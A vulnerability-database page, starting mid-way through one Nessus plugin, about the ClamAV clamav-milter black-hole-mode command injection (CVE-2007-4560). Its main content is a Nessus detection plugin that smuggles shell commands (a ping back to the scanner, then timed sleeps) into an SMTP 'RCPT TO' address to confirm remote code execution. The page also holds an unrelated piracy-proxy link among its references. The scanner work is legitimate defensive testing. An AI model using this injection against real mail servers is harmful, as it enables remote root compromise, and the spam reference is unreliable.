script_set_attribute(attribute:"canvas_package", value:'D2ExploitPack'); script_cwe_id(78); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:clamav"); script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:4.0"); script_set_attribute(attribute:"patch_publication_date", value:"2007/09/01"); script_set_attribute(attribute:"plugin_publication_date", value:"2007/09/03"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Debian Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l"); exit(0); } include("audit.inc"); include("debian_package.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian"); if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING); flag = 0; if (deb_check(release:"4.0", prefix:"clamav", reference:"0.90.1-3etch7")) flag++; if (deb_check(release:"4.0", prefix:"clamav-base", reference:"0.90.1-3etch7")) flag++; if (deb_check(release:"4.0", prefix:"clamav-daemon", reference:"0.90.1-3etch7")) flag++; if (deb_check(release:"4.0", prefix:"clamav-dbg", reference:"0.90.1-3etch7")) flag++; if (deb_check(release:"4.0", prefix:"clamav-docs", reference:"0.90.1-3etch7")) flag++; if (deb_check(release:"4.0", prefix:"clamav-freshclam", reference:"0.90.1-3etch7")) flag++; if (deb_check(release:"4.0", prefix:"clamav-milter", reference:"0.90.1-3etch7")) flag++; if (deb_check(release:"4.0", prefix:"clamav-testfiles", reference:"0.90.1-3etch7")) flag++; if (deb_check(release:"4.0", prefix:"libclamav-dev", reference:"0.90.1-3etch7")) flag++; if (deb_check(release:"4.0", prefix:"libclamav2", reference:"0.90.1-3etch7")) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get()); else security_hole(0); exit(0); } else audit(AUDIT_HOST_NOT, "affected");NASL family SMTP problems NASL id CLAMAV_MILTER_BLACKHOLE_CMD_EXEC.NASL description The remote host appears to be running a version of Clamav-milter, a filter for sendmail, configured with last seen 2020-06-01 modified 2020-06-02 plugin id 29830 published 2008-01-03 reporter This script is Copyright (C) 2008-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/29830 title ClamAV clamav-milter black-hole-mode Sendmail Recipient Field Arbitrary Command Execution code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(29830); script_version("1.28"); script_cvs_date("Date: 2018/11/15 20:50:24"); script_cve_id("CVE-2007-4560"); script_bugtraq_id(25439); script_name(english:"ClamAV clamav-milter black-hole-mode Sendmail Recipient Field Arbitrary Command Execution"); script_summary(english:"Tries to run a command via clamav-milter"); script_set_attribute(attribute:"synopsis", value: "The remote mail server allows execution of arbitrary commands." ); script_set_attribute(attribute:"description", value: "The remote host appears to be running a version of Clamav-milter, a filter for sendmail, configured with '--black-hole-mode' that fails to sanitize recipient addresses of shell metacharacters before using them in a call to 'popen()' to determine whether to discard incoming messages. An unauthenticated, remote attacker can leverage this issue to execute arbitrary code, typically as root." ); script_set_attribute(attribute:"see_also", value:"https://piratebay-proxies.com/best-internet-security/" ); script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/477723/100/0/threaded" ); script_set_attribute(attribute:"see_also", value:"https://seclists.org/fulldisclosure/2007/Dec/518" ); script_set_attribute(attribute:"solution", value: "Upgrade to ClamAV 0.91.2 or later." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'ClamAV Milter Blackhole-Mode Remote Code Execution'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'D2ExploitPack'); script_cwe_id(78); script_set_attribute(attribute:"plugin_publication_date", value: "2008/01/03"); script_set_attribute(attribute:"patch_publication_date", value: "2007/08/24"); script_set_attribute(attribute:"vuln_publication_date", value: "2007/08/24"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:clamav:clamav"); script_end_attributes(); script_category(ACT_ATTACK); script_family(english:"SMTP problems"); script_copyright(english:"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc."); script_dependencies("smtpserver_detect.nasl", "os_fingerprint.nasl"); script_require_ports("Services/smtp", 25); script_require_keys("Settings/ThoroughTests"); exit(0); } include("global_settings.inc"); include("misc_func.inc"); include("smtp_func.inc"); if (! thorough_tests ) exit(0); # Don't bother checking Windows as ClamAV isn't known to run on it. os = get_kb_item("Host/OS"); if (os && "Windows" >< os) exit(0); port = get_service(svc: "smtp", default: 25, exit_on_fail: 1); if (get_kb_item('SMTP/'+port+'/broken')) exit(0); # Open a connection. soc = smtp_open(port:port, helo:this_host_name()); if (!soc) exit(0); from = ""; # nb: must be a valid sender rcpt = "nobody"; # nb: must be a valid recipient on remote # Try to ping the Nessus host with a special pattern. ping_pat = "cafebabe"; cmd = string("sleep 1; ping -p ", ping_pat, " -c 3 ", this_host_name()); filter = string("icmp and icmp[0] = 8 and src host ", get_host_ip()); c = string('MAIL FROM: <', from, '>'); send(socket:soc, data:string(c, "\r\n")); s = smtp_recv_line(socket:soc); if (strlen(s) && ereg(pattern:"^[2-3][0-9][0-9] .*", string:s)) { c = string('RCPT TO: <', rcpt, '+"|', cmd, '"@localhost>'); send(socket:soc, data:string(c, "\r\n")); s = smtp_recv_line(socket:soc); if (strlen(s) && ereg(pattern:"^[2-3][0-9][0-9] .*", string:s)) { c = 'DATA'; send(socket:soc, data:string(c, "\r\n")); s = smtp_recv_line(socket:soc); if (strlen(s) && ereg(pattern:"^[2-3][0-9][0-9] .*", string:s)) { c = '.'; s = send_capture(socket:soc, data:string(c, "\r\n"), pcap_filter:filter); icmp_data = get_icmp_element(icmp:s, element:"data"); if (tolower(ping_pat) >< tolower(hexstr(icmp_data))) { smtp_close(socket:soc); security_hole(port); exit(0); } } } } # Try several times to exploit the issue to pause execution for a bit. # # nb: this sort of check might be problemmatic if the nessusd host # is heavily loaded. if ( report_paranoia < 2 ) exit(0); if (thorough_tests) delays = make_list(1, 6, 11, 16, 21); else delays = make_list(1, 4, 7); pauses = make_array(); foreach delay (delays) { cmd = string("sleep ", delay+1); c = string('MAIL FROM: <', from, '>'); send(socket:soc, data: c + '\r\n'); s = smtp_recv_line(socket:soc); if (strlen(s) && ereg(pattern:"^[2-3][0-9][0-9] .*", string:s)) { c = string('RCPT TO: <', rcpt, '+"|', cmd, '"@localhost>'); send(socket:soc, data:string(c, "\r\n")); s = smtp_recv_line(socket:soc); if (strlen(s) && ereg(pattern:"^[2-3][0-9][0-9] .*", string:s)) { c = 'DATA'; send(socket:soc, data:string(c, "\r\n")); s = smtp_recv_line(socket:soc); if (strlen(s) && ereg(pattern:"^[2-3][0-9][0-9] .*", string:s)) { # Time how long the remote takes to respond. start = unixtime(); c = '.'; send(socket:soc, data:string(c, "\r\n")); s = smtp_recv_line(socket:soc, retry:5); end = unixtime(); pause = end - start; pauses[delay] = pause; # nb: we're done if the delay obviously had no effect. if (strlen(s) && pause < delay) break; } else break; } else break; } else break; } smtp_close(socket:soc); # Look at the actual time taken for each test. prev_diff = NULL; foreach delay (delays) { # Exit if for some reason we didn't complete all the tests. if (isnull(pauses[delay])) exit(0); # Exit if we're not being paranoid and the second order difference # between tests is +-1 second of the expected difference, so we # can be reasonably certain the plugin is responsible for the # delays rather than a load issue on the remote. diff = pauses[delay]; if (report_paranoia < 2 && !isnull(prev_diff)) { diff2 = diff - prev_diff; if ( (thorough_tests && (diff2 < 4 || diff2 > 6)) || (!thorough_tests && (diff2 < 2 || diff2 > 4)) ) exit(0); } prev_diff = diff; } security_hole(port);
Packetstorm
| data source | https://packetstormsecurity.com/files/download/82333/clamav_milter_blackhole.rb.txt |
| id | PACKETSTORM:82333 |
| last seen | 2016-12-05 |
| published | 2009-10-28 |
| reporter | patrick |
| source | https://packetstormsecurity.com/files/82333/ClamAV-Milter-Blackhole-Mode-Remote-Code-Execution.html |
| title | ClamAV Milter Blackhole-Mode Remote Code Execution |
Saint
| bid | 25439 |
| description | ClamAV milter popen command injection |
| id | misc_av_clamwinup,misc_av_clam |
| osvdb | 36909 |
| title | clamav_milter_popen |
| type | remote |
References
- http://www.nruns.com/security_advisory_clamav_remote_code_exection.php
- http://www.securityfocus.com/bid/25439
- http://www.debian.org/security/2007/dsa-1366
- https://www.redhat.com/archives/fedora-package-announce/2007-September/msg00104.html
- http://security.gentoo.org/glsa/glsa-200709-14.xml
- http://www.mandriva.com/security/advisories?name=MDKSA-2007:172
- http://www.novell.com/linux/security/advisories/2007_18_sr.html
- http://www.trustix.org/errata/2007/0026/
- http://www.securitytracker.com/id?1018610
- http://secunia.com/advisories/26674
- http://secunia.com/advisories/26654
- http://secunia.com/advisories/26683
- http://secunia.com/advisories/26751
- http://secunia.com/advisories/26822
- http://secunia.com/advisories/26916
- http://securityreason.com/securityalert/3063
- http://docs.info.apple.com/article.html?artnum=307562
- http://lists.apple.com/archives/security-announce/2008/Mar/msg00001.html
- http://secunia.com/advisories/29420
- http://www.vupen.com/english/advisories/2008/0924/references
- http://www.securityfocus.com/archive/1/477723/100/0/threaded